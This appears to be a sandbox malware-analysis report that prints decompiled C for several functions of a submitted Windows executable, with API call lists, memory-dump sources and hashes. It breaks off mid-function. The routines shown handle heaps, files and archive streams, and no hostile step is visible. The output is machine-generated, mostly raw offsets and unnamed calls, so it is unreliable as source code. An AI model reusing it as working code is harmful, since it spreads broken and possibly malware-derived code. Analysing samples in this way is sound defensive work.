                              Control-flow Graph

                              C-Code - Quality: 85%
                              			E00402F15(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _t57;
				void* _t73;
				intOrPtr _t90;
				void* _t109;
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t118;

				E00413954(E00419269, _t118);
				 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) = 0;
				E00403376(_t118 - 0x94);
				 *(_t118 - 4) = 0;
				 *((intOrPtr*)(_t118 - 0x94)) = __ecx;
				E00401D7A(_t118 - 0x90, __edx);
				E00401D7A(_t118 - 0x84,  *((intOrPtr*)(_t118 + 8)));
				_push(0xf0);
				_t90 = E00403A76();
				 *((intOrPtr*)(_t118 + 8)) = _t90;
				 *(_t118 - 4) = 1;
				if(_t90 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = E004034E3(_t90);
				}
				 *(_t118 - 4) = 0;
				 *((intOrPtr*)(_t118 - 0x78)) = _t57;
				E0040640D(_t118 - 0x74, _t57);
				if( *((intOrPtr*)(_t118 + 0xc)) == 0) {
					E00403113(_t118 - 0x94, __eflags);
					goto L8;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xd8)) = 1;
					 *((intOrPtr*)(_t118 + 0xc)) = 0;
					 *(_t118 - 4) = 2;
					_t116 = E00413220(_t118 + 0xc, E004032E1, _t118 - 0x94);
					if(_t116 == 0) {
						 *((intOrPtr*)(_t118 - 0x18)) = 0;
						 *((intOrPtr*)(_t118 - 0x14)) = 0;
						 *((intOrPtr*)(_t118 - 0x10)) = 0;
						E00402170(_t118 - 0x18, 3);
						_t109 = 0x45;
						 *(_t118 - 4) = 3;
						_t73 = E0040602F(_t109);
						 *(_t118 - 4) = 4;
						E00401D7A(_t118 - 0x18, _t73);
						 *(_t118 - 4) = 3;
						E00403A9C( *((intOrPtr*)(_t118 - 0x24)));
						_push(_t118 + 0xc);
						_push(_t118 - 0x18);
						E0040309D( *((intOrPtr*)(_t118 - 0x78)));
						E00403A9C( *((intOrPtr*)(_t118 - 0x18)));
						 *(_t118 - 4) = 0;
						E004131E0(_t118 + 0xc);
						L8:
						_t38 = _t118 + 0x14; // 0x414be4
						_t115 =  *_t38;
						E00401D7A(_t115, _t118 - 0x30);
						__eflags =  *((intOrPtr*)(_t115 + 4));
						if(__eflags == 0) {
							__eflags =  *((intOrPtr*)(_t118 - 0x78)) + 0xe4;
							E00401D7A(_t115,  *((intOrPtr*)(_t118 - 0x78)) + 0xe4);
						}
						_t116 =  *((intOrPtr*)(_t118 - 0x34));
						 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xe0));
					} else {
						E004131E0(_t118 + 0xc);
					}
				}
				 *(_t118 - 4) =  *(_t118 - 4) | 0xffffffff;
				E0040348A(_t118 - 0x94,  *(_t118 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0xc));
				return _t116;
			}










                              0x00402f1a
                              0x00402f37
                              0x00402f39
                              0x00402f45
                              0x00402f48
                              0x00402f4e
                              0x00402f5c
                              0x00402f61
                              0x00402f6c
                              0x00402f6e
                              0x00402f73
                              0x00402f77
                              0x00402f80
                              0x00402f80
                              0x00402f79
                              0x00402f79
                              0x00402f79
                              0x00402f86
                              0x00402f89
                              0x00402f8c
                              0x00402f94
                              0x0040303d
                              0x00000000
                              0x00402f9a
                              0x00402f9d
                              0x00402fa7
                              0x00402fb9
                              0x00402fc2
                              0x00402fc6
                              0x00402fda
                              0x00402fdd
                              0x00402fe0
                              0x00402fe3
                              0x00402fed
                              0x00402fee
                              0x00402ff2
                              0x00402ffb
                              0x00402fff
                              0x00403004
                              0x0040300b
                              0x00403017
                              0x0040301b
                              0x0040301c
                              0x00403024
                              0x0040302a
                              0x00403030
                              0x00403042
                              0x00403042
                              0x00403042
                              0x0040304b
                              0x00403050
                              0x00403053
                              0x0040305a
                              0x00403060
                              0x00403060
                              0x0040306b
                              0x00403074
                              0x00402fc8
                              0x00402fcb
                              0x00402fcb
                              0x00402fc6
                              0x00403076
                              0x00403080
                              0x0040308d
                              0x00403095

                              APIs
                              • __EH_prolog.LIBCMT ref: 00402F1A
                                • Part of subcall function 00403376: __EH_prolog.LIBCMT ref: 0040337B
                                • Part of subcall function 004034E3: __EH_prolog.LIBCMT ref: 004034E8
                                • Part of subcall function 0040309D: __EH_prolog.LIBCMT ref: 004030A2
                                • Part of subcall function 0040309D: ShowWindow.USER32(00414BE4,00000001,000001F4,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030FB
                                • Part of subcall function 004131E0: CloseHandle.KERNEL32(00000000,00000000,00403035,?,?,00000000,00000003,?,00000000,?,?,00000000,00000000,00000000), ref: 004131EA
                                • Part of subcall function 004131E0: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 004131F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$CloseErrorHandleLastShowWindow
                              • String ID: KA
                              • API String ID: 2740091781-4133974868
                              • Opcode ID: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                              • Instruction ID: b66072ba2aa71961cefff889ac2f3310996ab01b533407b8592e0c78779ee57e
                              • Opcode Fuzzy Hash: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                              • Instruction Fuzzy Hash: 2F41AF31900249DBCB11EFA5C991AEDBBB8AF14314F1480BFE906B72D2DB385B45CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408902 Relevance: 3.1, APIs: 2, Instructions: 85COMMON
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E00408902(intOrPtr* __ecx) {
				long _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t39;
				intOrPtr* _t43;
				intOrPtr* _t59;
				long _t62;
				intOrPtr* _t64;
				void* _t65;

				E00413954(E00419B00, _t65);
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				 *((intOrPtr*)(_t65 - 0x14)) = 0;
				 *(_t65 - 4) = 0;
				 *((intOrPtr*)(_t65 - 0x10)) = 0;
				 *(_t65 - 4) = 1;
				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
						goto L12;
					} else {
						_push(0x10);
						_t39 = E00403A76();
						if(_t39 == 0) {
							_t64 = 0;
						} else {
							 *((intOrPtr*)(_t39 + 4)) = 0x41b5e8;
							 *((intOrPtr*)(_t39 + 8)) = 0;
							 *(_t39 + 0xc) =  *(_t39 + 0xc) | 0xffffffff;
							 *_t39 = 0x41b494;
							 *((intOrPtr*)(_t39 + 4)) = 0x41b484;
							_t64 = _t39;
						}
						E0040640D(_t65 - 0x14, _t64);
						if(E00406434(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
							goto L12;
						} else {
							_t33 = GetLastError();
						}
					}
				} else {
					_push(8);
					_t43 = E00403A76();
					if(_t43 == 0) {
						_t43 = 0;
					} else {
						 *((intOrPtr*)(_t43 + 4)) = 0;
						 *_t43 = 0x41b600;
					}
					E0040640D(_t65 - 0x10, _t43);
					L12:
					_t33 = E00408524(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
				}
				_t62 = _t33;
				_t34 =  *((intOrPtr*)(_t65 - 0x10));
				 *(_t65 - 4) = 0;
				if(_t34 != 0) {
					 *((intOrPtr*)( *_t34 + 8))(_t34);
				}
				_t35 =  *((intOrPtr*)(_t65 - 0x14));
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if(_t35 != 0) {
					 *((intOrPtr*)( *_t35 + 8))(_t35);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t62;
			}












                              0x00408907
                              0x0040890c
                              0x0040890d
                              0x00408913
                              0x00408915
                              0x00408918
                              0x0040891b
                              0x00408921
                              0x00408925
                              0x0040894e
                              0x00000000
                              0x00408950
                              0x00408950
                              0x00408952
                              0x0040895a
                              0x0040897b
                              0x0040895c
                              0x0040895c
                              0x00408963
                              0x00408966
                              0x0040896a
                              0x00408970
                              0x00408977
                              0x00408977
                              0x00408981
                              0x00408992
                              0x0040899f
                              0x00000000
                              0x00408994
                              0x00408994
                              0x00408994
                              0x00408992
                              0x00408927
                              0x00408927
                              0x00408929
                              0x00408931
                              0x0040893e
                              0x00408933
                              0x00408933
                              0x00408936
                              0x00408936
                              0x00408944
                              0x004089a2
                              0x004089b3
                              0x004089b3
                              0x004089b8
                              0x004089ba
                              0x004089bf
                              0x004089c2
                              0x004089c7
                              0x004089c7
                              0x004089ca
                              0x004089cd
                              0x004089d3
                              0x004089d8
                              0x004089d8
                              0x004089e3
                              0x004089eb

                              APIs
                              • __EH_prolog.LIBCMT ref: 00408907
                              • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00408AEB,?,?,?,?,?,?,?,00000000), ref: 00408994
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorH_prologLast
                              • String ID:
                              • API String ID: 1057991267-0
                              • Opcode ID: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                              • Instruction ID: a8fc1237ba57e47b0ed65f04e9c7bd5e3c99de29461016f9efabf40ab0132a5b
                              • Opcode Fuzzy Hash: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                              • Instruction Fuzzy Hash: 3F3181B19012499FCB10DF95CA859BEBBA0FF04314B14817FE495B72A1CB388D41CB6A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004051C8 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E004051C8(void* __ecx, intOrPtr* __edx, void* __eflags) {
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t24;
				long _t27;
				void* _t31;
				void* _t41;
				intOrPtr* _t44;
				void* _t46;

				_t51 = __eflags;
				_t39 = __edx;
				E00413954(E0041965C, _t46);
				_t41 = __ecx;
				_t44 = __edx;
				E00405268(_t46 - 0x1c);
				while(1) {
					 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
					_push(_t44);
					_push(_t41);
					_t17 = E0040511B(_t46 - 0x1c, _t39, _t51); // executed
					_t31 = _t46 - 0x1c;
					if(_t17 == 0) {
						break;
					}
					_t21 = E004051A4(_t31);
					_t53 = _t21;
					if(_t21 == 0) {
						_t31 = _t46 - 0x1c;
						break;
					} else {
						 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
						E004051A4(_t46 - 0x1c);
						E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
						_t24 = E004058CD( *_t44, _t39, _t53); // executed
						if(_t24 != 0) {
							L6:
							E00405268(_t46 - 0x1c);
							continue;
						} else {
							if(E0040498D( *_t44) != 0) {
								_t20 = 1;
							} else {
								_t27 = GetLastError();
								_t51 = _t27 - 0xb7;
								if(_t27 != 0xb7) {
									L9:
									_t20 = 0;
									__eflags = 0;
								} else {
									goto L6;
								}
							}
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
					return _t20;
				}
				E004051A4(_t31);
				E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
				goto L9;
			}












                              0x004051c8
                              0x004051c8
                              0x004051cd
                              0x004051d7
                              0x004051d9
                              0x004051de
                              0x004051e3
                              0x004051e3
                              0x004051e7
                              0x004051e8
                              0x004051ec
                              0x004051f3
                              0x004051f6
                              0x00000000
                              0x00000000
                              0x004051f8
                              0x004051fd
                              0x004051ff
                              0x00405243
                              0x00000000
                              0x00405201
                              0x00405201
                              0x00405208
                              0x00405210
                              0x00405218
                              0x0040521f
                              0x00405239
                              0x0040523c
                              0x00000000
                              0x00405221
                              0x0040522a
                              0x00405264
                              0x0040522c
                              0x0040522c
                              0x00405232
                              0x00405237
                              0x00405254
                              0x00405254
                              0x00405254
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405237
                              0x0040522a
                              0x0040521f
                              0x0040525b
                              0x00405263
                              0x00405263
                              0x00405246
                              0x0040524e
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 004051CD
                                • Part of subcall function 0040511B: __EH_prolog.LIBCMT ref: 00405120
                                • Part of subcall function 004058CD: __EH_prolog.LIBCMT ref: 004058D2
                              • GetLastError.KERNEL32(?,?,?,?,00000003,?,00000000,?,00000000), ref: 0040522C
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ErrorLast
                              • String ID:
                              • API String ID: 2901101390-0
                              • Opcode ID: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                              • Instruction ID: 4ca71d6396368880cce983a38ddafe9bc91d36a7a330c4fa26da9ce64be84c4d
                              • Opcode Fuzzy Hash: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                              • Instruction Fuzzy Hash: 43114831C00A059ACF14FBA5D4426EFBB70DF51368F1042BFA462771E28B7C1A4ACE19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004159F8 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004159F8(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x425a34 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E004158B0(_t12, _t15);
					 *0x425a38 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E0041659C();
							goto L5;
						}
					} else {
						_t10 = E00415A55(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x425a34);
							goto L7;
						}
					}
				}
			}








                              0x004159f8
                              0x00415a09
                              0x00415a0f
                              0x00415a11
                              0x00415a16
                              0x00415a4e
                              0x00415a50
                              0x00415a18
                              0x00415a18
                              0x00415a20
                              0x00415a25
                              0x00415a34
                              0x00415a37
                              0x00000000
                              0x00415a39
                              0x00415a39
                              0x00000000
                              0x00415a39
                              0x00415a27
                              0x00415a2c
                              0x00415a3e
                              0x00415a40
                              0x00415a51
                              0x00415a53
                              0x00415a54
                              0x00415a42
                              0x00415a48
                              0x00000000
                              0x00415a48
                              0x00415a40
                              0x00415a25

                              APIs
                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                • Part of subcall function 004158B0: GetVersionExA.KERNEL32 ref: 004158CF
                              • HeapDestroy.KERNEL32 ref: 00415A48
                                • Part of subcall function 00415A55: HeapAlloc.KERNEL32(00000000,00000140,00415A31,000003F8), ref: 00415A62
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Heap$AllocCreateDestroyVersion
                              • String ID:
                              • API String ID: 2507506473-0
                              • Opcode ID: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                              • Instruction ID: d610f17f35f819288534aaa08ec9d41b03b5a17a7fe04688d897b1e7918b3c37
                              • Opcode Fuzzy Hash: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                              • Instruction Fuzzy Hash: 00F03070696A01EBDB206B715DCA7E62A949F84799F104637F540C85A0EB7884C19A1D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405ACE Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                              Download Yara Rule
                              C-Code - Quality: 80%
                              			E00405ACE(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
				long _v8;
				long _v12;
				long _t12;
				long _t13;
				long* _t14;

				_push(__ecx);
				_push(__ecx);
				_t12 = _a4;
				_v8 = _a8;
				_v12 = _t12;
				_t13 = SetFilePointer( *__ecx, _t12,  &_v8, _a12); // executed
				_v12 = _t13;
				if(_t13 != 0xffffffff || GetLastError() == 0) {
					_t14 = _a16;
					 *_t14 = _v12;
					_t14[1] = _v8;
					return 1;
				} else {
					return 0;
				}
			}








                              0x00405ad1
                              0x00405ad2
                              0x00405ad9
                              0x00405adc
                              0x00405ae2
                              0x00405ae9
                              0x00405af2
                              0x00405af5
                              0x00405b05
                              0x00405b0b
                              0x00405b10
                              0x00000000
                              0x00405b01
                              0x00000000
                              0x00405b01

                              APIs
                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00405AE9
                              • GetLastError.KERNEL32(?,?,?,?), ref: 00405AF7
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer
                              • String ID:
                              • API String ID: 2976181284-0
                              • Opcode ID: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                              • Instruction ID: ae3098a1e04470c1e0e5e0b92581544958da7485e9b3b22056b888074196ff7d
                              • Opcode Fuzzy Hash: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                              • Instruction Fuzzy Hash: 89F0B7B4504208EFCB14CF54D9448AE7BF9EF49350B108169F815A7390D731AE00DF69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040BBC9 Relevance: 2.0, APIs: 1, Instructions: 515COMMON
                              Download Yara Rule
                              C-Code - Quality: 88%
                              			E0040BBC9(signed char __edx) {
				signed int _t287;
				signed char _t289;
				signed int _t291;
				signed char _t292;
				signed char _t295;
				signed char _t305;
				intOrPtr _t307;
				signed char _t308;
				signed char _t314;
				intOrPtr _t315;
				signed char _t323;
				signed char _t325;
				signed char _t329;
				signed char _t330;
				signed char _t334;
				signed char _t335;
				signed char _t340;
				signed char _t345;
				signed char _t349;
				signed char _t351;
				signed char _t352;
				signed char _t356;
				signed char _t368;
				signed char _t372;
				signed int _t380;
				intOrPtr _t388;
				intOrPtr _t397;
				signed char _t401;
				signed char _t407;
				signed char _t408;
				intOrPtr _t410;
				intOrPtr _t475;
				signed char _t485;
				signed int _t488;
				signed char _t489;
				intOrPtr* _t490;
				signed int _t492;
				intOrPtr _t498;
				signed int _t501;
				signed int _t502;
				void* _t503;
				signed char _t506;
				signed int _t508;
				intOrPtr _t509;
				void* _t510;
				void* _t512;

				_t485 = __edx;
				_t287 = E00413954(E0041A262, _t510);
				_t407 = 0;
				 *(_t510 - 4) = 0;
				 *((char*)(_t510 - 0x4c)) = _t287 & 0xffffff00 |  *(_t510 + 0x14) != 0x00000000;
				_t289 =  *(_t510 + 0x18);
				 *((intOrPtr*)(_t510 - 0x10)) = _t512 - 0x124;
				 *(_t510 + 0x18) = _t289;
				if(_t289 != 0) {
					 *((intOrPtr*)( *_t289 + 4))(_t289);
				}
				 *(_t510 - 4) = 1;
				 *(_t510 - 0x1c) = _t407;
				 *(_t510 - 0x18) = _t407;
				 *((char*)(_t510 + 0x17)) =  *(_t510 + 0x10) == 0xffffffff;
				if( *((char*)(_t510 + 0x17)) != 0) {
					 *(_t510 + 0x10) =  *( *(_t510 + 8) + 0x7c);
				}
				if( *(_t510 + 0x10) != _t407) {
					E00402155(_t510 - 0x30);
					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
					_t291 = 0;
					__eflags = 0;
					 *(_t510 - 4) = 2;
					 *(_t510 - 0x34) = 0;
					while(1) {
						__eflags = _t291 -  *(_t510 + 0x10);
						if(_t291 >=  *(_t510 + 0x10)) {
							break;
						}
						__eflags =  *((char*)(_t510 + 0x17));
						if( *((char*)(_t510 + 0x17)) == 0) {
							_t291 =  *( *(_t510 + 0xc) + _t291 * 4);
						}
						_t496 =  *(_t510 + 8);
						 *(_t510 - 0x38) = _t291;
						_t508 =  *( *((intOrPtr*)( *(_t510 + 8) + 0x1c8)) + _t291 * 4);
						__eflags = _t508 - 0xffffffff;
						if(_t508 != 0xffffffff) {
							_t380 =  *(_t510 - 0x28);
							__eflags = _t380 - _t407;
							if(_t380 == _t407) {
								L16:
								 *(_t510 - 0x7c) =  *(_t510 - 0x7c) | 0xffffffff;
								 *(_t510 - 0x78) = _t508;
								E0040C3F8(_t510 - 0x74);
								 *(_t510 - 0x5c) = _t407;
								 *(_t510 - 0x58) = _t407;
								_push(_t510 - 0x7c);
								 *(_t510 - 4) = 5;
								E0040C46D(_t510 - 0x30);
								 *(_t510 - 4) = 2;
								E004042AD(_t510 - 0x74);
								_t475 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t496 + 0x58)) + _t508 * 4)));
								_t67 = _t510 - 0x1c;
								 *_t67 =  *(_t510 - 0x1c) + _t475;
								__eflags =  *_t67;
								_t388 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
								asm("adc [ebp-0x18], edx");
								 *((intOrPtr*)(_t388 + 0x20)) = _t475;
								 *(_t388 + 0x24) = _t485;
								L17:
								_t498 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
								_t410 =  *((intOrPtr*)( *((intOrPtr*)( *(_t510 + 8) + 0x1b4)) + _t508 * 4));
								_t509 =  *((intOrPtr*)(_t498 + 0x10));
								while(1) {
									_t393 =  *(_t510 - 0x38) - _t410;
									__eflags = _t509 -  *(_t510 - 0x38) - _t410;
									if(_t509 >  *(_t510 - 0x38) - _t410) {
										goto L13;
									}
									_t87 = _t498 + 8; // 0xa
									E0040C413(_t87, _t393 & 0xffffff00 | __eflags == 0x00000000);
									_t509 = _t509 + 1;
								}
								goto L13;
							}
							_t397 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t380 * 4 - 4));
							__eflags = _t508 -  *((intOrPtr*)(_t397 + 4));
							if(_t508 ==  *((intOrPtr*)(_t397 + 4))) {
								goto L17;
							}
							goto L16;
						} else {
							_push(_t508);
							_push(_t291);
							_push(E0040C30E(_t510 - 0x130));
							 *(_t510 - 4) = 3;
							E0040C46D(_t510 - 0x30);
							 *(_t510 - 4) = 2;
							E004042AD(_t510 - 0x128);
							L13:
							_t291 =  *(_t510 - 0x34) + 1;
							_t407 = 0;
							 *(_t510 - 0x34) = _t291;
							continue;
						}
					}
					_t292 =  *(_t510 + 0x18);
					__eflags =  *((intOrPtr*)( *_t292 + 0xc))(_t292,  *(_t510 - 0x1c),  *(_t510 - 0x18)) - _t407;
					if(__eflags == 0) {
						E0040AC6A(_t510 - 0x108, __eflags, 1);
						_push(0x38);
						 *(_t510 - 4) = 7;
						 *(_t510 - 0x40) = _t407;
						 *(_t510 - 0x3c) = _t407;
						 *(_t510 - 0x1c) = _t407;
						 *(_t510 - 0x18) = _t407;
						_t295 = E00403A76();
						 *(_t510 + 0x10) = _t295;
						__eflags = _t295 - _t407;
						 *(_t510 - 4) = 8;
						if(_t295 == _t407) {
							_t501 = 0;
							__eflags = 0;
						} else {
							_t501 = E004072A1(_t295);
						}
						_t488 = _t501;
						__eflags = _t501 - _t407;
						 *(_t510 - 4) = 7;
						 *(_t510 - 0x38) = _t488;
						 *(_t510 - 0x14) = _t501;
						if(_t501 != _t407) {
							 *((intOrPtr*)( *_t501 + 4))(_t501);
						}
						_push(_t407);
						 *(_t510 - 4) = 9;
						E00407334(_t501,  *(_t510 + 0x18));
						_t502 = 0;
						__eflags = 0;
						 *(_t510 + 0x14) = 0;
						while(1) {
							 *(_t488 + 0x28) =  *(_t510 - 0x1c);
							 *(_t488 + 0x2c) =  *(_t510 - 0x18);
							 *(_t488 + 0x20) =  *(_t510 - 0x40);
							 *(_t488 + 0x24) =  *(_t510 - 0x3c);
							_t489 = E00407410(_t488);
							__eflags = _t489 - _t407;
							if(_t489 != _t407) {
								break;
							}
							__eflags = _t502 -  *(_t510 - 0x28);
							if(_t502 <  *(_t510 - 0x28)) {
								_push(0x38);
								 *(_t510 - 0x48) = _t407;
								 *(_t510 - 0x44) = _t407;
								_t490 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t502 * 4));
								 *((intOrPtr*)(_t510 - 0x54)) =  *((intOrPtr*)(_t490 + 0x20));
								 *((intOrPtr*)(_t510 - 0x50)) =  *((intOrPtr*)(_t490 + 0x24));
								_t305 = E00403A76();
								 *(_t510 + 0xc) = _t305;
								__eflags = _t305 - _t407;
								 *(_t510 - 4) = 0xb;
								if(_t305 == _t407) {
									_t408 = 0;
									__eflags = 0;
								} else {
									_t408 = E0040C5E8(_t305);
								}
								__eflags = _t408;
								 *(_t510 - 0x34) = _t408;
								 *(_t510 - 4) = 9;
								 *(_t510 + 0x10) = _t408;
								if(_t408 != 0) {
									 *((intOrPtr*)( *_t408 + 4))(_t408);
								}
								 *(_t510 - 4) = 0xc;
								_t503 =  *(_t510 + 8) + 0x10;
								_t307 =  *_t490;
								__eflags = _t307 - 0xffffffff;
								if(_t307 == 0xffffffff) {
									_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x1a4)) +  *(_t490 + 4) * 4));
								}
								__eflags =  *( *(_t510 + 8) + 0x1e0);
								_t173 = _t490 + 8; // 0x8
